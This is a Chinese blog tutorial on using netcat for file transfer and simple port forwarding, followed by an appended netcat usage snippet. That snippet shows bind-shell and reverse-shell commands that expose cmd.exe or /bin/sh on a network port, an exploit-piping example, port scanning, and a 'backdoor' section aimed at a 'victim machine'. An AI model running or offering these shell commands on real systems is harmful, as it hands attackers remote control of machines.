Linux小技巧:使用NC实现文件传输

之前在服务器上拷贝文件时,要么使用scp, 要么就是上传到ftp服务器,然后再需要使用的服务器上重新下载,虽然这两种方式也没啥毛病,但是缺陷也比较明显

  • scp: 要求授权验证
  • ftp: 需要一个第三方的存储系统,用完之后如果不删除的话这个文件就一直在那

接下来介绍下使用ncat(即nc)来实现文件拷贝

nc知识点

1. 基本说明 & 安装

ncat/nc 是一个类似于cat的网络命令,常用语网络读、写、重定向;它提供的功能非常强大,本文介绍一下将介绍一下基本使用姿势与应用场景

首先判断系统是否有安装

  • ubuntu 默认有这个命令
  • centos 需要自己安装
# 判断是否有安装 ncat命令
which ncat
# which nc 也可以判断是否安装有这个命令
复制代码

若没有安装,执行下面的命令

sudo yum install nc -y
#  yum install nmap-ncat -y
复制代码

2. 监听端口链接

监听本机某个端口,相当于起了一个网络服务

# nc -l 端口号
nc -l 9999
复制代码

注意

  • 上面默认监听的是tcp端口
  • 如需指定udp,可以通过 nc -l -u 9999

3. 连接远程服务器

# nc ip 端口号
nc 127.0.0.1 9999

# 如果需要链接的是udp端口,可以加一个 -u
复制代码

连上之后,就可以发送信息(回车之后服务端会接收到客户端的传输数据)

3. nc文件拷贝

基于上面的case,可以利用nc来实现文件拷贝

目标服务器,启动一个端口监听

nc -l 9999 > save.txt
复制代码

文件所属服务器,用于上传文件

nc 127.0.0.1 9999 < data.txt
复制代码

说明

  • 上面这个也可以走udp端口进行文件传输,加上-u即可
  • 流程也可以反过来,在文件所属服务器上监听端口,目标服务器用于下载文件 (上面的方式适用于文件所属服务器限制了访问端口的场景;下面这种这种适用于目标服务器ip不确定的case)
# 文件所属服务器
nc -l 9999 < data.txt

# 下载文件的服务器
nc 127.0.0.1 9999 > save.txt
复制代码

4. nc作为代理

使用nc作为一个简单的转发

ncat -l 8080 | ncat 192.168.0.2 80
复制代码

上面这个命令实现单向的转发,将链接到本机8080的连接转发到192.168.0.2:80

如果希望实现双向管道,可以如下

mkfifo 2way
ncat -l 8080 0<2way | ncat 192.168.0.2 80 1>2way
复制代码

除了上面的代理方式,也可以利用nc来实现端口转发,借助 -c 命令

ncat -u -l  80 -c  'ncat -u -l 8080'

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
软件介绍: 工具名:Netcat 作者:Hobbit && Chris Wysopal 类别:开放源码 平台:Linux/BSD/Unix/Windows WINDOWS下版本号:[v1.10 NT] 参数介绍: *nc.exe -h*即可看到各参数的使用方法。 基本格式:nc [-options] hostname port[s] [ports] … nc -l -p port [options] [hostname] [port] -d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -L 连接关闭后,仍然继续监听 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的输 -p port 本地端口号 -r 随机本地及远程端口 -s addr 本地源地址 -t 使用TELNET交互方式 -u UDP模式 -v 详细输出–用两个-v可得到更详细的内容 -w secs timeout的时间 -z 将输入输出关掉–用于扫描时 端口的表示方法可写为M-N的范围格式。 ======================================================== 基本用法: 1)连接到REMOTE主机,例子: 格式:nc -nvv 192.168.x.x 80 讲解:连到192.168.x.x的TCP80端口 2)监听LOCAL主机,例子: 格式:nc -l -p 80 讲解:监听本机的TCP80端口 3)扫描远程主机,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 讲解:扫描192.168.x.x的TCP80到TCP445的所有端口 4)REMOTE主机绑定SHELL,例子: 格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe 讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口 5)REMOTE主机绑定SHELL并反向连接,例子: 格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法(其实NC的用法还有很多, 当配合管道命令”|”与重定向命令””等等命令功能更强大……)。 ======================================================== 高级用法: 6)作攻击程序用,例子: 格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc -nvv 192.168.x.x 80 c:log.txt 讲解:使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到*c:log.txt*中,如果把*>* 改为*>>*即可以追加日志 附:*c:log.txt*为日志等 9)作蜜罐用[3],例子: 格式1:nc -L -p 80 < c:honeypot.txt 格式2:type.exe c:honeypot.txt|nc -L -p 80 讲解:使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,并把*c:honeypot.txt*的内容*送*入其管道中 10) 后门 victim machine: //受害者的机器 nc -l -p port -e cmd //win2000 nc -l -p port -e /bin/sh //unix,linux
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值